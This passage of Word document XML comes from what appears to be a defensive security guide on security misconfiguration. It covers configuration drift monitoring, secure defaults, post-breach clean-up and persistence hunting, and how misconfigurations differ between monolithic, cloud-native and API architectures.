          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy automated tools (such as AWS Config, Azure Policy, or Open Policy Agent) that continuously audit the running production state against established secure configuration baselines. Configure these tools to automatically alert—or self-heal—if an unauthorized manual configuration change occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CC756" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Secure System Defaults:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Securely configure framework-level settings across the entire stack. Ensure all API error responses go through a single, customized exception handler that completely masks raw backend traces, explicitly disable external entity resolution in all XML processing engines, and enforce secure, HTTP strict transport headers natively at the reverse proxy or load balancer layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7ED08" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Blast Radius Clean-Up (Post-Exploit Recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D2DFD"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lastRenderedPageBreak/>
        <w:t>If an attacker successfully leverages a configuration flaw to breach the perimeter, a comprehensive incident response investigation must be launched to clean the environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA13D5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Log Auditing &amp; Access Trailing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Examine web server access logs, WAF telemetry, and cloud auditing trails (e.g., AWS CloudTrail) starting from the timestamp of the initial anomaly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807B2CF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trace the attacker's IP addresses and user-agent strings to identify exactly which internal APIs, cloud storage components, or database tables were queried or exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63A6A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Persistence Hunting (Backdoor Verification):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Attackers who break in via a misconfiguration will often attempt to establish long-term persistence. Check system configuration files ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs, Windows Registry) for unauthorized modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC8339" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Review Kubernetes deployment manifests or cloud identity providers (IAM) to ensure the attacker did not provision new backdoor API keys, administrative service accounts, or rogue SSH keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142EA8A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Secure Environment Restoration:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Do not attempt to patch a running, compromised server. The safest recovery method is to destroy the compromised container instances or virtual machines entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C78E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Reprovision completely fresh, pristine application nodes from verified, secure source code images and hardened </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> baselines, utilizing clean databases restored from a known pre-breach backup snapshot. Validated system credentials must be rotated across the entire ecosystem during this rebuild phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826849E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Context &amp; Variations (The Modern Landscape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA674E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Environment Differences: Monolith vs. Cloud-Native</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A073B"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How Security Misconfiguration manifests shifts fundamentally depending on the underlying architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9451DA"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Traditional Monolithic On-Premise Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414F5DC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Blueprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The blast radius is tightly bound to the physical or virtual operating system hosting the monolith (e.g., a Windows Server running an IIS web server and an MS SQL database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328AE5A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Misconfigurations usually manifest as unpatched host operating systems, active legacy network protocols (like SMBv1), broad filesystem write privileges, unchanged administrative default settings on application servers (like Tomcat or WebLogic), and open local network ports. The primary danger here is </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>an attacker compromising the host OS and jumping laterally into the internal corporate intranet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5535D"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Modern Cloud-Native / Microservices / Serverless Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BF81F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Blueprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application is split into hundreds of decoupled elements—containers (Docker), orchestration layers (Kubernetes), API gateways, and serverless functions (AWS Lambda)—all defined by software parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A85DE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the infrastructure is code, the misconfiguration is purely software-driven. It manifests as overly permissive </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Identity and Access Management (IAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles, unhardened container base images, exposed Kubernetes dashboards, public cloud storage buckets (e.g., world-readable AWS S3 buckets), and unencrypted environmental variables. An attacker exploiting a serverless function doesn't care about host OS persistence; instead, they abuse the function’s IAM execution role to exfiltrate data directly from cloud storage buckets or neighboring cloud services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E6FDE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. API vs. Web Frontends: Changing Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C63F6F"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 xml:space="preserve">When targeting a headless API (REST, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) instead of a traditional web frontend, attackers shift their focus from attacking visual routing components to abusing data serialization formats and server-side processing mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1771"/>
        <w:gridCol w:w="3359"/>
        <w:gridCol w:w="4011"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="086E4643" w14:textId="77777777" w:rsidTr="00B064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7C7079" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Feature / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Atack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44F3A20E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Traditonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519CD398" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Headless API (REST/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>GraphQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="33A6FB17" w14:textId="77777777" w:rsidTr="00B064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8A3C3B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Atack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vector</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17354647" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Web server </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
